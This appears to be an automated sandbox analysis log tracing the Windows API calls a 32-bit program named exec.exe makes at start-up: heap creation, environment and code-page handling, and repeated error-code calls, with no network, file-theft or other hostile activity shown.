# Flog Txt Version 1 # Analyzer Version: 3.0.1 # Analyzer Build Date: Apr 9 2019 11:17:16 # Log Creation Date: 12.04.2019 22:27:02.543 Process: id = "1" image_name = "exec.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\exec.exe" page_root = "0x463bc000" os_pid = "0x96c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\exec.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x970 [0038.145] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afd44 | out: lpSystemTimeAsFileTime=0x1afd44*(dwLowDateTime=0xee527e40, dwHighDateTime=0x1d4f17e)) [0038.145] GetCurrentProcessId () returned 0x96c [0038.145] GetCurrentThreadId () returned 0x970 [0038.146] GetTickCount () returned 0x1a034 [0038.146] QueryPerformanceCounter (in: lpPerformanceCount=0x1afd3c | out: lpPerformanceCount=0x1afd3c*=15795443241) returned 1 [0038.146] GetStartupInfoW (in: lpStartupInfo=0x1afce8 | out: lpStartupInfo=0x1afce8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\exec.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x1afd4c, hStdError=0x1248be4)) [0038.146] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0038.146] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x8c0000 [0038.148] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0038.148] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b [0038.148] GetProcAddress (hModule=0x76c20000, lpProcName="FlsGetValue") returned 0x76c31252 [0038.148] GetProcAddress (hModule=0x76c20000, lpProcName="FlsSetValue") returned 0x76c34208 [0038.148] GetProcAddress (hModule=0x76c20000, lpProcName="FlsFree") returned 0x76c3359f [0038.149] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x214) returned 0x8c07d0 [0038.149] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0038.149] GetCurrentThreadId () returned 0x970 [0038.149] GetStartupInfoW (in: lpStartupInfo=0x1afc84 | out: lpStartupInfo=0x1afc84*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\exec.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x12471aa, hStdOutput=0x12474e3, hStdError=0x8c07d0)) [0038.149] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x800) returned 0x8c09f0 [0038.150] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0038.150] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0038.150] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0038.150] SetHandleCount (uNumber=0x20) returned 0x20 [0038.150] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\exec.exe\" " [0038.150] GetEnvironmentStringsW () returned 0x2e46c8* [0038.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0038.150] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x565) returned 0x8c11f8 [0038.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x8c11f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0038.150] FreeEnvironmentStringsW (penv=0x2e46c8) returned 1 [0038.150] GetLastError () returned 0x5 [0038.150] SetLastError (dwErrCode=0x5) [0038.150] GetLastError () returned 0x5 [0038.151] SetLastError (dwErrCode=0x5) [0038.151] GetLastError () returned 0x5 [0038.151] SetLastError (dwErrCode=0x5) [0038.151] GetACP () returned 0x4e4 [0038.151] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x220) returned 0x8c1768 [0038.151] GetLastError () returned 0x5 [0038.151] SetLastError (dwErrCode=0x5) [0038.151] IsValidCodePage (CodePage=0x4e4) returned 1 [0038.151] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1afc4c | out: lpCPInfo=0x1afc4c) returned 1 [0038.151] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1af718 | out: lpCPInfo=0x1af718) returned 1 [0038.151] GetLastError () returned 0x5 [0038.151] SetLastError (dwErrCode=0x5) [0038.151] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1afb2c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0038.151] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1afb2c, cbMultiByte=256, lpWideCharStr=0x1af498, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鲧ĤĀ") returned 256 [0038.151] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鲧ĤĀ", cchSrc=256, lpCharType=0x1af72c | out: lpCharType=0x1af72c) returned 1 [0038.151] GetLastError () returned 0x5 [0038.151] SetLastError (dwErrCode=0x5) [0038.151] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1afb2c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0038.151] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1afb2c, cbMultiByte=256, lpWideCharStr=0x1af468, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0038.152] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0038.152] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x1af258, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0038.152] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x1afa2c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x8c\x6d\xf3\x43\x64\xfc\x1a", lpUsedDefaultChar=0x0) returned 256 [0038.152] GetLastError () returned 0x5 [0038.152] SetLastError (dwErrCode=0x5) [0038.152] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1afb2c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0038.152] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1afb2c, cbMultiByte=256, lpWideCharStr=0x1af488, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0038.152] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0038.152] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x1af278, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0038.152] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x1af92c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x8c\x6d\xf3\x43\x64\xfc\x1a", lpUsedDefaultChar=0x0) returned 256 [0038.152] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x124f728, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\exec.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\exec.exe")) returned 0x2e [0038.152] GetLastError () returned 0x0 [0038.152] SetLastError (dwErrCode=0x0) [0038.152] GetLastError () returned 0x0 [0038.152] SetLastError (dwErrCode=0x0) [0038.152] GetLastError () returned 0x0 [0038.152] SetLastError (dwErrCode=0x0) [0038.152] GetLastError () returned 0x0 [0038.153] SetLastError (dwErrCode=0x0) [0038.153] GetLastError () returned 0x0 [0038.153] SetLastError (dwErrCode=0x0) [0038.153] GetLastError () returned 0x0 [0038.153] SetLastError (dwErrCode=0x0) [0038.153] GetLastError () returned 0x0 [0038.153] SetLastError (dwErrCode=0x0) [0038.153] GetLastError () returned 0x0 [0038.153] SetLastError (dwErrCode=0x0) [0038.153] GetLastError () returned 0x0 [0038.153] SetLastError (dwErrCode=0x0) [0038.153] GetLastError () returned 0x0 [0038.153] SetLastError (dwErrCode=0x0) [0038.153] GetLastError () returned 0x0 [0038.153] SetLastError (dwErrCode=0x0) [0038.153] GetLastError () returned 0x0 [0038.153] SetLastError (dwErrCode=0x0) [0038.153] GetLastError () returned 0x0 [0038.153] SetLastError (dwErrCode=0x0) [0038.153] GetLastError () returned 0x0 [0038.154] SetLastError (dwErrCode=0x0) [0038.154] GetLastError () returned 0x0 [0038.154] SetLastError (dwErrCode=0x0) [0038.154] GetLastError () returned 0x0 [0038.154] SetLastError (dwErrCode=0x0) [0038.154] GetLastError () returned 0x0 [0038.154] SetLastError (dwErrCode=0x0) [0038.154] GetLastError () returned 0x0 [0038.154] SetLastError (dwErrCode=0x0) [0038.154] GetLastError () returned 0x0 [0038.154] SetLastError (dwErrCode=0x0) [0038.154] GetLastError () returned 0x0 [0038.154] SetLastError (dwErrCode=0x0) 